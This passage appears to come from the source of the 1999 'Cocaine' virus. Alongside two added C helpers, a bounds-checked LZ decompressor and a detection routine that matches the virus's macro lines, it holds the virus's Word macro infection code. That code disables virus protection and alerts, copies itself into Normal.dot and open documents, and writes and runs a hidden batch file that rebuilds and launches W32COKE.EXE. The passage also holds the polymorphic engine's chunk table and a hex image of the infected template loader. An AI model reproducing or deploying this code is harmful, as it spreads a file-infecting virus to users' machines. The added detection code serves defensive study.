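            len = 1 + (size_t)(src[in] & 0x0F);
            offset = ((size_t)(src[in] & 0xF0) << 4) + src[in + 1];
            in += 2;
            /* offset 0 or beyond the bytes produced would read outside dst */
            if (offset == 0 || offset > out)
                return LZ_BAD_OFFSET;
            if (len > dst_cap - out)
                return LZ_OUTPUT_FULL;
            for (i = 0; i < len; i++, out++) /* byte-wise: ranges may overlap */
                dst[out] = dst[out - offset];
        } else {                             /* literal item: one byte */
            if (in >= src_len)
                return LZ_TRUNCATED;
            if (out == dst_cap)
                return LZ_OUTPUT_FULL;
            dst[out++] = src[in++];
        }
        control >>= 1;
        controlbits--;
    }
    *dst_len = out;
    return LZ_OK;
}

int main(void)
{
    int rc = lzrw1_decompress_checked(SAMPLE_PACKED, sizeof SAMPLE_PACKED,
                                      demo_out, sizeof demo_out, &demo_len);
    printf("rc=%d len=%zu data=%.*s\n", rc, demo_len, (int)demo_len,
           (const char *)demo_out);
    return 0;
}
```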
;---------------------------------(MACRO.INC)---------------------------------
;Macro poly data
;(c) Vecna 1999
;ASM->COM->LZ->INC
;The code in the comment below is to be compiled to a .COM file, then compressed
;with my LZ compressor, then BIN2INCed. It is the code used by the macro poly
;engine and does the actual infection process. The macro code is divided into
;chunks. The format of each chunk is simple: the first byte indicates the
;step at which the chunk is processed, and an ASCIIZ string follows. The macro
;poly engine copies each chunk, shuffling chunks of the same level among
;themselves and inserting macro garbage code between the real macro lines. Some
;chunks (6) receive special processing by the engine ;-)
;The macro poly engine also does magic with the %X labels: they are replaced by
;random strings.
; '%1
; SUB AUTOCLOSE()
; ON ERROR RESUME NEXT
;OPTIONS.VIRUSPROTECTION = FALSE
; OPTIONS.CONFIRMCONVERSIONS = FALSE
; OPTIONS.SAVENORMALPROMPT = FALSE
; APPLICATION.DISPLAYALERTS = WDALERTSNONE
; SHOWVISUALBASICEDITOR = FALSE
; %2=1
; %3=1
; FOR %4 = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT
; IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "'%1" THEN %2=%4
; NEXT %4
; FOR %4 = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT
; IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "'%1" THEN %3=%4
; NEXT %4
; OPEN "C:\%7.BAT" FOR OUTPUT AS 1
; PRINT #1,"@ECHO OFF"
; PRINT #1,"DEBUG <C:\COCAINE.SRC >NUL"
; PRINT #1,"COPY C:\W32COKE.EX C:\W32COKE.EXE >NUL"
; PRINT #1,"C:\W32COKE.EXE"
; PRINT #1,"DEL C:\W32COKE.EX >NUL"
; PRINT #1,"DEL C:\COCAINE.SRC >NUL"
; PRINT #1,"DEL C:\COCAINE.SYS >NUL"
; PRINT #1,"DEL C:\W32COKE.EXE >NUL"
; PRINT #1,"DEL C:\%7.BAT >NUL"
; CLOSE #1
; SET %5 = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%2).CODEMODULE
; SET %6 = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%3).CODEMODULE
; IF %5.LINES(1, 1) <> "'%1" THEN
; %5.DELETELINES 1, %5.COUNTOFLINES
; %5.INSERTLINES 1, %6.LINES(1, %6.COUNTOFLINES)
; END IF
; IF %6.LINES(1, 1) <> "'%1" THEN
; %6.DELETELINES 1, %6.COUNTOFLINES
; %6.INSERTLINES 1, %5.LINES(1, %5.COUNTOFLINES)
; END IF
; OPEN "C:\ANCEV.SYS" FOR OUTPUT AS 1
; CLOSE 1
; SHELL %7.BAT, VBHIDE
; FOR %4 = 1 TO 100
; NEXT %4
; KILL %7.BAT
; END SUB
;
; The following code should be compiled to a .COM file:
;
; .MODEL TINY
; .CODE
; .STARTUP
;
; CRLF EQU <13,10>
;
; DB 1
; DB "'%1", CRLF
; DB "SUB AUTOCLOSE()", CRLF
; DB "ON ERROR RESUME NEXT", CRLF
; DB 0
;
; DB 2
; DB "OPTIONS.VIRUSPROTECTION = FALSE", CRLF
; DB 0
;
; DB 2
; DB "OPTIONS.CONFIRMCONVERSIONS = FALSE", CRLF
; DB 0
;
; DB 2
; DB "OPTIONS.SAVENORMALPROMPT = FALSE", CRLF
; DB 0
;
; DB 2
; DB "APPLICATION.DISPLAYALERTS = WDALERTSNONE", CRLF
; DB 0
;
; DB 2
; DB "SHOWVISUALBASICEDITOR = FALSE", CRLF
; DB 0
;
; DB 2
; DB "%2=1", CRLF
; DB 0
;
; DB 2
; DB "%3=1", CRLF
; DB 0
;
; DB 3
; DB "FOR %4 = 1 TO NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS.COUNT", CRLF
; DB 'IF NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "''%1" THEN %2=%4', CRLF
; DB "NEXT %4", CRLF
; DB 0
;
; DB 3
; DB "FOR %4 = 1 TO ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS.COUNT", CRLF
; DB 'IF ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%4).CODEMODULE.LINES(1,1) = "''%1" THEN %3=%4', CRLF
; DB "NEXT %4", CRLF
; DB 0
;
; DB 3
; DB 'OPEN "C:\%7.BAT" FOR OUTPUT AS 1', CRLF
; DB 'PRINT #1,"@ECHO OFF"', CRLF
; DB 'PRINT #1,"DEBUG <C:\COCAINE.SRC >NUL"', CRLF
; DB 'PRINT #1,"COPY C:\W32COKE.EX C:\W32COKE.EXE >NUL"', CRLF
; DB 'PRINT #1,"C:\W32COKE.EXE"', CRLF
; DB 'PRINT #1,"DEL C:\W32COKE.EX >NUL"', CRLF
; DB 'PRINT #1,"DEL C:\COCAINE.SRC >NUL"', CRLF
; DB 'PRINT #1,"DEL C:\COCAINE.SYS >NUL"', CRLF
; DB 'PRINT #1,"DEL C:\W32COKE.EXE >NUL"', CRLF
; DB 'PRINT #1,"DEL C:\%7.BAT >NUL"', CRLF
; DB 'CLOSE #1', CRLF
; DB 0
;
; DB 4
; DB "SET %5 = NORMALTEMPLATE.VBPROJECT.VBCOMPONENTS(%2).CODEMODULE", CRLF
; DB 0
;
; DB 4
; DB "SET %6 = ACTIVEDOCUMENT.VBPROJECT.VBCOMPONENTS(%3).CODEMODULE", CRLF
; DB 0
;
; DB 5
; DB 'IF %5.LINES(1, 1) <> "''%1" THEN', CRLF
; DB "%5.DELETELINES 1, %5.COUNTOFLINES", CRLF
; DB "%5.INSERTLINES 1, %6.LINES(1, %6.COUNTOFLINES)", CRLF
; DB "END IF", CRLF
; DB 0
;
; DB 5
; DB 'IF %6.LINES(1, 1) <> "''%1" THEN', CRLF
; DB "%6.DELETELINES 1, %6.COUNTOFLINES", CRLF
; DB "%6.INSERTLINES 1, %5.LINES(1, %5.COUNTOFLINES)", CRLF
; DB "END IF", CRLF
; DB 0
;
; DB 6
;;CREATE DEBUG SCRIPT
; DB 0
;
; DB 7
; DB 'OPEN "C:\ANCEV.SYS" FOR OUTPUT AS 1', CRLF
; DB 'PRINT #1,""', CRLF
; DB "CLOSE #1", CRLF
; DB 0
;
; DB 7
; DB "SHELL %7.BAT, VBHIDE", CRLF
; DB "FOR %4=1 TO 100", CRLF
; DB "NEXT %4", CRLF
; DB "KILL %7.BAT", CRLF
; DB 0
;
; DB 8
; DB "END SUB", CRLF
; DB 0
;
; END
macro_sized dd 0
macro_size EQU 750 ; size in bytes
;---------------------------------(MACRO.INC)---------------------------------
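;Added example, not the author's code: a C parser for the chunk format
;described above (a step byte followed by an ASCIIZ string). It collects the
;lines that carry no %X label and checks a macro's text for all of them,
;whatever their order and whatever garbage lines sit between them. All names,
;the step-0 end-of-table rule and every sample string are assumptions
;constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_CHUNKS 32
#define MAX_LINES  64
#define MAX_LINE   128

struct chunk { uint8_t step; const char *text; };

/* Constructed table using a few of the lines listed above. Each record is a
   step byte (octal escape), CRLF-terminated macro lines, then NUL. */
static const uint8_t SAMPLE_TABLE[] =
    "\001'%1\r\nSUB AUTOCLOSE()\r\nON ERROR RESUME NEXT\r\n\0"
    "\002OPTIONS.VIRUSPROTECTION = FALSE\r\n\0"
    "\002%2=1\r\n\0"
    "\006\0"
    "\010END SUB\r\n";
static const uint8_t BROKEN_TABLE[] = { 1, 'A', 'B' };  /* constructed: no NUL */
/* Constructed macro text: labels randomised, one garbage line inserted. */
static const char SUSPECT[] =
    "'QWZRT\r\nSUB AUTOCLOSE()\r\nON ERROR RESUME NEXT\r\nKJHG = 7\r\n"
    "XBNM=1\r\nOPTIONS.VIRUSPROTECTION = FALSE\r\nEND SUB\r\n";
/* Constructed benign macro that shares only the generic lines. */
static const char BENIGN[] = "SUB AUTOCLOSE()\r\nMSGBOX \"Saved\"\r\nEND SUB\r\n";

static struct chunk demo_chunks[MAX_CHUNKS];   /* scratch storage */
static char demo_lines[MAX_LINES][MAX_LINE];

/* Split buf into (step, text) records. A step byte of 0 ends the table
   (assumption). Returns the record count, or -1 on a missing NUL or overflow. */
int parse_chunks(const uint8_t *buf, size_t len, struct chunk *out, int max)
{
    size_t pos = 0;
    int n = 0;
    while (pos < len && buf[pos] != 0) {
        const uint8_t *nul;
        if (n == max)
            return -1;
        out[n].step = buf[pos++];
        nul = memchr(buf + pos, 0, len - pos);
        if (nul == NULL)
            return -1;
        out[n++].text = (const char *)(buf + pos);
        pos = (size_t)(nul - buf) + 1;
    }
    return n;
}

/* Store every non-empty line without a '%' label: these lines survive the
   label randomisation unchanged. Returns the number of lines stored. */
int invariant_lines(const struct chunk *c, int n, char lines[][MAX_LINE], int max)
{
    int count = 0, i;
    for (i = 0; i < n; i++) {
        const char *p = c[i].text;
        while (*p) {
            const char *eol = strstr(p, "\r\n");
            size_t len = eol ? (size_t)(eol - p) : strlen(p);
            if (len > 0 && len < MAX_LINE && !memchr(p, '%', len) && count < max) {
                memcpy(lines[count], p, len);
                lines[count++][len] = '\0';
            }
            p += len + (eol ? 2 : 0);
        }
    }
    return count;
}

/* Whole-line search, so a fragment inside a longer line does not count. */
static int has_line(const char *text, const char *line)
{
    size_t n = strlen(line);
    const char *hit;
    for (hit = strstr(text, line); hit; hit = strstr(hit + 1, line))
        if ((hit == text || hit[-1] == '\n') &&
            (hit[n] == '\0' || hit[n] == '\r' || hit[n] == '\n'))
            return 1;
    return 0;
}

/* 1 if every label-free line occurs in macro_text, 0 if one is missing,
   -1 if the table is malformed. Order and extra lines are ignored. */
int matches_template(const uint8_t *table, size_t len, const char *macro_text)
{
    int n = parse_chunks(table, len, demo_chunks, MAX_CHUNKS), count, i;
    if (n < 0)
        return -1;
    count = invariant_lines(demo_chunks, n, demo_lines, MAX_LINES);
    for (i = 0; i < count; i++)
        if (!has_line(macro_text, demo_lines[i]))
            return 0;
    return count > 0;
}

int main(void)
{
    printf("suspect=%d benign=%d\n",
           matches_template(SAMPLE_TABLE, sizeof SAMPLE_TABLE, SUSPECT),
           matches_template(SAMPLE_TABLE, sizeof SAMPLE_TABLE, BENIGN));
    return 0;
}
```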
;----------------------------------(NDOT.INC)---------------------------------
;Macro poly data
;(c) Vecna 1999
;This is the binary image of the LZ-compressed NORMAL.DOT loader. The loader
;is basically a WinWord8 template with the code below. Its function is to load
;the second, polymorphic part of the macro virus code from disk. The routine
;that drops the image should be changed to make it _patch_ the ' COCAINE string,
;copying the first line of the dropped virus source there, so that the virus
;stops reinfecting... bahh, never mind... :-)
;Sub AutoExec()
;On Error Goto erro
;Application.DisplayAlerts = False
;Application.EnableCancelKey = wdDisabled
;For i = 1 To NormalTemplate.VBProject.VBComponents.Count
;If NormalTemplate.VBProject.VBComponents(i).CodeModule.Lines(1,1) = "'Cocaine" Then GoTo erro
;Next i
;NormalTemplate.VBProject.VBComponents.Import("c:\cocaine.sys")
;NormalTemplate.Save
;erro:
;End Sub
normaldot_size EQU 8292 ; size in bytes
normaldot_sized dd 0
DB 058H,02FH,080H,004H,03DH,00FH,005H,00EH,010H,023H,080H,053H,0A4H,023H,0D4H
DB 013H,084H,00EH,01FH,00FH,00FH,0FDH,0FFH,008H,010H,096H,053H,0E5H,002H,00EH
DB 013H,03CH,023H,040H,033H,0BCH,023H,044H,023H,0CCH,003H,01BH,003H,0CCH,003H
DB 054H,003H,05CH,06FH,000H,067H,000H,013H,0C3H,0BFH,0EAH,06FH,000H,06BH,000H
DB 013H,0E8H,067H,000H,053H,0A4H,06FH,000H,020H,002H,080H,021H,002H,004H,022H
DB 002H,004H,023H,002H,004H,043H,018H,06BH,000H,05FH,055H,063H,014H,063H,004H
DB 06FH,000H,06BH,000H,043H,094H,032H,002H,03CH,033H,002H,004H,034H,002H,004H
DB 035H,002H,004H,036H,002H,004H,037H,055H,055H,002H,004H,038H,002H,004H,039H
DB 002H,004H,03AH,002H,004H,03BH,002H,004H,03CH,002H,004H,03DH,002H,004H,03EH
DB 002H,004H,03FH,0ADH,05AH,002H,004H,040H,002H,004H,013H,0FCH,042H,002H,008H
DB 043H,002H,004H,044H,002H,004H,045H,002H,004H,043H,0B5H,047H,002H,008H,048H
DB 0ABH,0AAH,002H,004H,003H,0B8H,04AH,002H,008H,04BH,002H,004H,04CH,002H,004H
DB 04DH,002H,004H,04EH,002H,004H,04FH,002H,004H,050H,002H,004H,0EAH,0AAH,051H
DB 002H,004H,052H,002H,004H,053H,002H,004H,003H,02CH,003H,004H,056H,002H,00CH
DB 057H,002H,004H,058H,002H,004H,059H,002H,004H,0F6H,07FH,05AH,002H,004H,003H
DB 018H,05CH,006H,008H,013H,0A8H,00FH,004H,00FH,010H,00FH,010H,00FH,010H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,007H,010H,001H,0E0H,0FCH,016H,001H,000H
DB 001H,0B6H,022H,0C3H,034H,046H,002H,008H,0FFH,0FFH,002H,0A6H,004H,008H,005H
DB 00AH,003H,00EH,00FH,004H,00FH,010H,0BFH,055H,00BH,010H,023H,015H,023H,04DH
DB 023H,049H,023H,045H,008H,069H,001H,023H,04FH,003H,00EH,078H,002H,02FH,0DEH
DB 002H,004H,0F7H,022H,078H,0F5H,00FH,0D8H,022H,080H,003H,014H,002H,00FH,032H
DB 049H,000H,000H,08DH,09AH,08FH,09AH,000H,002H,07EH,023H,00FH,088H,002H,015H
DB 003H,034H,0AFH,01DH,002H,007H,00FH,003H,009H,010H,003H,0A5H,013H,002H,070H
DB 0D6H,002H,013H,003H,004H,0EBH,023H,0C5H,002H,041H,003H,018H,000H,000H,0DFH
DB 0F3H,07FH,002H,00AH,002H,019H,000H,00CH,002H,008H,003H,067H,00FH,004H,00FH
DB 010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,00FH,010H,009H,010H,023H,0CCH
DB 002H,028H,085H,000H,053H,04CH,003H,012H,000H,002H,0EBH,053H,010H,008H,00AH
DB 094H,005H,00AH,000H,000H,002H,03CH,005H,00AH,004H,054H,0FFH,0FFH,015H,08DH
DB 001H,000H,04EH,000H,030H,000H,07BH,002H,004H,030H,002H,004H,032H,002H,004H
DB 039H,0B1H,01EH,002H,004H,036H,000H,02DH,002H,006H,003H,012H,030H,00CH,00AH
DB 043H,006H,016H,009H,01EH,005H,024H,005H,006H,034H,000H,036H,000H,08CH,000H
DB 07DH,000H,019H,0A2H,0DDH,036H,002H,000H,0DFH,033H,0E1H,013H,086H,001H,001H
DB 080H,012H,01EH,0CCH,03FH,002H,081H,023H,09DH,003H,07BH,0FFH,0FFH,003H,0A7H
DB 013H,080H,002H,017H,004H,003H,005H,016H,015H,04DH,093H,0BBH,033H,0A3H,00CH
DB 011H,07CH,0FAH,01AH,002H,00BH,018H,00FH,00CH,003H,039H,007H,014H,003H,008H
DB 00DH,000H,0A3H,035H,094H,003H,017H,004H,004H,093H,0B7H,003H,018H,003H,004H
DB 0DFH,0FFH,003H,011H,022H,081H,002H,007H,022H,009H,002H,006H,000H,002H,0C5H
DB 003H,080H,003H,01CH,005H,076H,003H,00AH,00FH,032H,003H,014H,00BH,004H,004H
DB 039H,002H,005H,00FH,0FDH,007H,014H,002H,00BH,01FH,0F1H,007H,01BH,0FFH,002H
DB 000H,070H,002H,01FH,04DH,032H,0E8H,005H,013H,002H,00DH,002H,02CH,005H,006H
DB 015H,077H,01FH,0E1H,003H,00CH,00FH,004H,00FH,010H,00FH,010H,007H,010H,0FEH
DB 0CAH,001H,002H,0EEH,022H,081H,008H,000H,013H,064H,004H,016H,002H,00CH,0DFH
DB 0FFH,023H,094H,024H,0CAH,002H,00CH,053H,04DH,033H,024H,000H,002H,00CH,063H
DB 0B5H,053H,005H,003H,00CH,0B3H,015H,003H,0E8H,003H,00CH,043H,0A9H,043H,05DH
DB 003H,00CH,0DDH,0A2H,003H,030H,090H,003H,049H,002H,030H,0B3H,019H,0A0H,006H
DB 00CH,003H,018H,0C8H,003H,00CH,080H,008H,000H,003H,060H,0D8H,002H,00CH,026H
DB 03EH,004H,002H,024H,032H,055H,000H,0E0H,002H,00CH,000H,080H,009H,003H,006H
DB 002H,0DCH,012H,048H,00AH,00CH,003H,0F6H,001H,001H,012H,004H,0F0H,002H,01CH
DB 08FH,004H,004H,070H,000H,0C1H,000H,01CH,002H,013H,014H,0AFH,000H,020H,000H
DB 01EH,060H,028H,002H,028H,000H,020H,002H,002H,01DH,002H,003H,020H,000H,024H
DB 002H,005H,012H,022H,004H,012H,0F7H,000H,080H,080H,020H,000H,026H,002H,0F6H
DB 000H,0A4H,022H,0BFH,020H,000H,028H,002H,021H,000H,02AH,002H,004H,082H,009H
DB 02CH,002H,004H,02EH,002H,08BH,000H,000H,004H,018H,005H,01CH,026H,002H,007H
DB 020H,025H,000H,02CH,002H,000H,000H,001H,000H,021H,000H,030H,002H,025H,000H
DB 032H,002H,002H,000H,0AEH,000H,008H,000H,000H,0A8H,027H,043H,06FH,063H,061H
DB 069H,06EH,065H,005H,000H,094H,0A2H,020H,093H,002H,07EH,067H,032H,0A1H,08CH
DB 040H,053H,000H,007H,060H,0A3H,03BH,00CH,000H,058H,002H,02CH,00EH,000H,063H
DB 03AH,05CH,063H,005H,02EH,02EH,030H,020H,073H,079H,073H,01DH,002H,082H,009H
DB 078H,042H,040H,034H,002H,001H,000H,040H,004H,014H,042H,040H,06BH,00FH,022H
DB 0D8H,092H,0BBH,063H,092H,033H,09BH,002H,052H,013H,056H,06CH,002H,0FCH,063H
DB 083H,003H,0F2H,013H,072H,001H,0A7H,0B1H,000H,000H,000H,041H,074H,074H,072H
DB 069H,062H,075H,074H,000H,065H,020H,056H,042H,05FH,04EH,061H,081H,000H,092H
DB 0EFH,020H,03DH,020H,022H,054H,068H,072H,084H,044H,06FH,063H,075H,06DH,065H
DB 06EH,010H,000H,000H,074H,022H,00DH,00AH,00AH,08CH,042H,061H,073H,001H,002H
DB 08CH,030H,07BH,030H,030H,000H,000H,030H,032H,030H,050H,039H,030H,036H,02DH
DB 000H,010H,030H,003H,008H,043H,007H,000H,000H,000H,014H,002H,012H,001H,024H
DB 030H,030H,034H,036H,07DH,001H,00DH,07CH,043H,072H,065H,000H,000H,061H,074H
DB 061H,062H,082H,06CH,001H,086H,046H,061H,06CH,073H,065H,00CH,05EH,000H,000H
DB 000H,050H,072H,065H,064H,065H,063H,06CH,061H,089H,000H,006H,049H,064H,000H
DB 08BH,054H,000H,000H,072H,075H,00DH,022H,040H,045H,078H,070H,06FH,073H,065H
DB 014H,01CH,054H,000H,065H,000H,000H,06DH,070H,06CH,061H,074H,065H,044H,030H
DB 065H,072H,069H,076H,002H,024H,011H,065H,000H,000H,043H,075H,0C0H,073H,074H
DB 06FH,06DH,069H,07AH,004H,088H,003H,032H,000H,053H,075H,000H,000H,062H,020H
DB 041H,075H,074H,06FH,000H,045H,078H,065H,063H,028H,029H,00DH,00AH,000H,000H
DB 000H,04FH,06EH,020H,045H,072H,072H,06FH,072H,080H,020H,047H,06FH,054H,06FH
DB 020H,065H,000H,000H,000H,005H,001H,080H,055H,070H,070H,06CH,069H,063H,061H
DB 074H,080H,069H,06FH,06EH,000H,000H,02EH,044H,069H,073H,000H,035H,080H,079H
DB 041H,06CH,065H,072H,074H,073H,000H,055H,000H,000H,013H,005H,034H,008H,011H
DB 045H,06EH,081H,030H,043H,061H,06EH,040H,063H,065H,06CH,000H,000H,04BH,065H
DB 079H,000H,012H,077H,086H,064H,000H,01BH,001H,00AH,064H,00DH,00AH,046H,000H
DB 000H,080H,02DH,012H,069H,080H,009H,031H,020H,080H,02FH,04EH,06FH,072H,008H
DB 06DH,061H,000H,000H,06CH,005H,05FH,02EH,056H,042H,050H,040H,072H,06FH,06AH
DB 065H,063H,074H,080H,004H,000H,000H,043H,020H,06FH,06DH,070H,06FH,06EH,080H
DB 0C5H,073H,02EH,000H,043H,06FH,075H,06EH,000H,000H,074H,00DH,00AH,049H,044H
DB 066H,020H,0A2H,017H,028H,069H,029H,000H,019H,064H,000H,000H,004H,065H,04DH
DB 06FH,064H,075H,06CH,065H,02EH,000H,04CH,012H,0C5H,073H,028H,031H,02CH,008H
DB 040H,000H,020H,031H,029H,000H,03BH,022H,012H,0D8H,004H,063H,061H,080H,004H
DB 022H,020H,054H,068H,000H,000H,065H,002H,06EH,089H,039H,04EH,065H,078H,074H
DB 020H,069H,014H,00DH,00AH,023H,025H,000H,042H,049H,080H,027H,072H,074H,020H
DB 040H,028H,022H,013H,0D1H,083H,014H,02EH,030H,012H,0CEH,022H,000H,000H,0C0H
DB 050H,00CH,010H,053H,061H,006H,076H,040H,073H,081H,052H,03AH,00DH,00AH,045H
DB 000H,000H,06EH,024H,064H,020H,0C0H,05CH,00DH,00AH,041H,000H,0D0H,0CFH,011H
DB 0E0H,0A1H,0B1H,008H,008H,01AH,0E1H,000H,00EH,001H,03EH,000H,003H,000H,0FEH
DB 0FFH,009H,039H,05DH,000H,0CCH,061H,05EH,081H,00CH,053H,04FH,0FFH,016H,004H
DB 000H,000H,009H,002H,004H,0E4H,004H,047H,049H,003H,017H,005H,000H,002H,000H
DB 000H,0AEH,02CH,001H,02AH,000H,05CH,000H,047H,000H,07BH,042H,05BH,053H,00CH
DB 053H,048H,034H,0C2H,0EEH,046H,05CH,03EH,0F3H,020H,003H,01AH,003H,004H,02DH
DB 000H,05FH,048H,003H,016H,009H,004H,055H,048H,023H,000H,033H,000H,02EH,002H
DB 050H,023H,000H,028H,000H,039H,000H,023H,002H,032H,03AH,002H,062H,041H,000H
DB 052H,000H,051H,000H,055H,000H,049H,000H,0A8H,00AH,056H,000H,04FH,0B2H,046H
DB 020H,0B2H,05AH,045H,022H,09DH,050H,002H,018H,04FH,002H,080H,052H,000H,041H
DB 000H,05AH,055H,04DH,002H,004H,053H,00FH,02CH,004H,02CH,043H,002H,034H,04DH
DB 002H,03EH,04EH,002H,00EH,05CH,002H,028H,049H,002H,056H,052H,055H,0B5H,002H
DB 014H,053H,002H,004H,046H,0A2H,026H,020H,002H,018H,048H,002H,03EH,052H,002H
DB 0BAH,044H,002H,042H,0A5H,0B8H,05CH,002H,06CH,02AH,0BAH,042H,002H,016H,033H
DB 002H,090H,032H,002H,092H,044H,000H,04CH,002H,002H,023H,002H,016H,022H,0D0H
DB 0C2H,058H,061H,0D2H,058H,0A2H,08AH,020H,0A2H,0E2H,061H,000H,073H,0A2H,066H
DB 063H,002H,08EH,046H,0A2H,068H,072H,002H,008H,041H,000H,070H,002H,002H,098H
DB 0FAH,06CH,000H,05FH,002H,02CH,003H,042H,05FH,000H,005H,0A8H,04AH,002H,060H
DB 043H,002H,070H,01EH,079H,00FH,00FH,008H,010H,0A2H,080H,0BFH,0EAH,032H,067H
DB 033H,063H,005H,004H,008H,019H,00FH,009H,00AH,010H,01BH,002H,00CH,07AH,0B6H
DB 0ADH,064H,002H,098H,072H,002H,010H,00FH,003H,00FH,010H,0FBH,0E5H,00FH,010H
DB 007H,010H,008H,012H,0E2H,005H,07AH,005H,006H,007H,018H,00FH,008H,00BH,010H
DB 049H,002H,00DH,084H,002H,002H,005H,002H,003H,00DH,0F6H,078H,0EFH,077H,000H
DB 06DH,002H,014H,00FH,003H,00FH,010H,00BH,010H,014H,00FH,080H,00BH,01DH,00FH
DB 00CH,006H,010H,054H,002H,008H,0A3H,0D8H,002H,007H,05FH,07FH,01FH,076H,003H
DB 013H,00FH,004H,00FH,010H,00CH,010H,010H,0D2H,080H,006H,002H,012H,063H,00FH
DB 013H,002H,002H,00BH,00FH,003H,00FH,010H,022H,066H,000H,044H,0D5H,000H,052H
DB 036H,027H,069H,000H,063H,0D2H,082H,074H,012H,086H,06FH,0D2H,0EAH,073H,00CH
DB 02CH,020H,03FH,03AH,022H,0F2H,0FDH,005H,083H,082H,035H,03FH,03AH,002H,018H
DB 083H,08CH,03FH,03AH,039H,036H,003H,00AH,037H,03AH,038H,022H,0A8H,030H,000H
DB 023H,000H,034H,023H,0A2H,002H,036H,03BH,03EH,072H,000H,071H,022H,0B2H,069H
DB 000H,076H,022H,0A2H,073H,000H,020H,0F2H,094H,065H,002H,006H,0EAH,045H,050H
DB 0E4H,01CH,067H,002H,006H,061H,012H,09CH,023H,0C8H,033H,01EH,003H,0B6H,072H
DB 004H,028H,06FH,000H,066H,052H,0F3H,020H,0ADH,01AH,032H,026H,066H,002H,00AH
DB 003H,018H,065H,032H,01EH,04FH,002H,00CH,066H,002H,0D4H,063H,062H,013H,003H
DB 030H,053H,000H,057H,0ADH,056H,002H,022H,052H,032H,092H,003H,07EH,04FH,032H
DB 024H,042H,002H,082H,04DH,004H,022H,00DH,048H,057H,002H,056H,072H,002H,07CH
DB 020H,00AH,056H,000H,003H,02AH,030H,002H,082H,04FH,000H,062H,000H,06AH,002H
DB 048H,063H,05BH,020H,002H,03AH,069H,002H,010H,072H,0A7H,0FEH,012H,034H,0F3H
DB 0AEH,01BH,02FH,0B8H,000H,04FH,068H,030H,002H,0E4H,033H,002H,0E6H,099H,092H
DB 00BH,00AH,01FH,02EH,013H,024H,009H,004H,017H,02EH,0A7H,01AH,033H,0D6H,013H
DB 02EH,003H,004H,043H,000H,043H,068H,057H,042H,062H,04EH,002H,0CAH,04FH,002H
DB 0D4H,043H,04CH,053H,000H,059H,055H,0EDH,042H,01CH,054H,032H,0B8H,04DH,002H
DB 0FAH,053H,032H,0BCH,044H,002H,0ECH,04CH,002H,010H,003H,03CH,054H,002H,0B2H
DB 003H,0ECH,003H,0F4H,0D5H,005H,043H,08EH,041H,012H,064H,074H,002H,0E4H,06DH
DB 002H,0C2H,017H,0F6H,00BH,0C6H,0E0H,008H,0C6H,041H,000H,046H,000H,035H,054H
DB 0D5H,000H,031H,002H,0C4H,031H,0A2H,03CH,032H,012H,0F4H,042H,012H,014H,035H
DB 042H,06AH,02DH,002H,016H,031H,002H,082H,005H,014H,0AAH,0EDH,043H,052H,004H
DB 044H,002H,01EH,034H,002H,02AH,034H,002H,032H,003H,022H,035H,002H,00CH,007H
DB 0CCH,07DH,012H,06AH,003H,08AH,003H,0C2H,06BH,0A3H,003H,004H,00FH,0C6H,057H
DB 002H,0BEH,05CH,002H,004H,00BH,0C6H,04DH,002H,010H,045H,0AAH,06DH,000H,073H
DB 022H,030H,054H,002H,0ECH,036H,037H,044H,002H,048H,01FH,0B2H,074H,012H,0A0H
DB 009H,028H,020H,000H,005H,068H,023H,00EH,01FH,0B4H,062H,024H,042H,01DH,0B4H
DB 001H,000H,0AAH,056H,0E4H,008H,0EEH,033H,052H,070H,032H,002H,0D4H,044H,002H
DB 0F6H,038H,002H,048H,063H,008H,046H,012H,044H,037H,002H,0DAH,031H,055H,0EBH
DB 002H,0F0H,044H,004H,014H,042H,002H,026H,041H,002H,0DCH,02DH,002H,004H,003H
DB 0F0H,035H,002H,0F0H,033H,002H,004H,023H,0CCH,005H,0F0H,06FH,0DBH,00FH,0EEH
DB 00FH,0EEH,005H,0EEH,015H,0AEH,050H,012H,0B0H,053H,0C8H,045H,002H,008H,00FH
DB 0F2H,045H,092H,001H,00FH,0F2H,06FH,022H,0D6H,00FH,0F2H,007H,000H,00FH,0F2H
DB 02FH,0A6H,00FH,0F2H,000H,000H,0E1H,02EH,045H,00DH,08FH,0E0H,01AH,010H,085H
DB 02EH,002H,000H,056H,060H,08CH,04DH,00BH,0B4H,000H,000H,01CH,001H,027H,0BAH
DB 013H,002H,046H,012H,0E6H,044H,022H,0B6H,034H,055H,0D5H,002H,0ECH,02DH,002H
DB 0DCH,042H,012H,012H,041H,014H,006H,030H,012H,008H,042H,002H,00AH,042H,012H
DB 028H,045H,002H,01AH,025H,0CEH,0AEH,05FH,041H,062H,080H,003H,0FCH,013H,010H
DB 044H,012H,032H,035H,012H,02AH,01FH,006H,015H,006H,07FH,022H,07FH,022H,07BH
DB 022H,04DH,022H,0E6H,043H,0EBH,055H,074H,03AH,079H,002H,04FH,002H,08AH,046H
DB 004H,018H,013H,032H,00DH,00EH,013H,040H,04FH,022H,08AH,037H,022H,02EH,044H
DB 022H,0F4H,04CH,06FH,017H,02FH,02EH,016H,03CH,04BH,01AH,03FH,0E4H,065H,052H
DB 00CH,013H,060H,04CH,042H,018H,02FH,030H,035H,024H,001H,052H,0EEH,003H,000H
DB 004H,050H,0FFH,002H,000H,000H,006H,0A2H,07BH,008H,002H,008H,016H,0D6H,00BH
DB 003H,020H,0B2H,069H,0D6H,062H,053H,08AH,00FH,004H,00FH,010H,00FH,010H,03DH
DB 0A8H,005H,010H,000H,074H,04EH,056H,09DH,003H,055H,008H,004H,08DH,09AH,001H
DB 000H,018H,032H,0DEH,068H,002H,09EH,073H,012H,082H,02AH,000H,06FH,002H,0AEH
